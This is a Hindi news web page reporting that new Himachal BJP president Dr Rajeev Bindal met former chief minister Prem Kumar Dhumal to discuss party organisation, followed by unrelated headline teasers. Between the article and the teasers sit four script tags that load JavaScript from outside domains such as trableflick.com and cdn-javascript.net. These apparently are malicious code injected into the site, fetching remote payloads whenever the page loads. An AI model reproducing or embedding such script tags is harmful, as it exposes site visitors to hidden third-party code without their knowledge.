<p>भाजपा की टीम हिमाचल तैयार करने से पहले नवनियुक्त प्रदेश अध्यक्ष डॉ राजीव बिंदल ने पूर्व मुख्यमंत्री एवं भाजपा के प्रदेश अध्यक्ष रहे प्रेम कुमार धूमल से उनके समीरपुर स्थित घर मुलाकात की। उन्होंने पूर्व मुख्यमंत्री प्रेम कुमार धूमल के साथ लंबा समय बिताया और इस दौरान संगठन के विस्तार को लेकर भी चर्चा की। बता दें कि डॉ. राजीव बिंदल धूमल सरकार में मंत्री भी रहे हैं। अब प्रदेश भाजपा की कमान मिलने के बाद डॉक्टर बिंदल सबका साथ लेकर विश्वास जीतने के कार्य में जुटे हैं। करीब 1 घंटे तक चली इस मुलाकात के बाद वह पालमपुर के लिए रवाना हो गए। यहां पर भाजपा प्रदेश अध्यक्ष पूर्व मुख्यमंत्री शांता कुमार से मुलाकात करेंगे।</p>
<p>आपको यह भी बता दें कि दिल्ली चुनावों के बाद भाजपा के प्रदेश कार्यकारिणी की घोषणा होने की संभावना जताई जा रही है इससे पहले डॉ. बिंदल ने लगभग सभी पूर्व प्रदेशाध्यक्ष से मिलने का लक्ष्य रखा है और इसी कड़ी में वह सभी वरिष्ठ नेताओं से भी मुलाकात कर रहे हैं। डॉक्टर बिंदल सबका साथ लेकर विश्वास जीतने की थ्योरी पर काम कर रहे हैं। ताकि पार्टी में गुटबाजी के लिए कोई जगह ना बचे। बरहाल ये तो आने वाला वक्त ही बताएगा कि डॉक्टर बिंदल इस इस थ्योरी पर चलकर संगठन कितना मजबूत कर पाते हैं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1579930447016″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…
Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…
Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…
Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…
Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…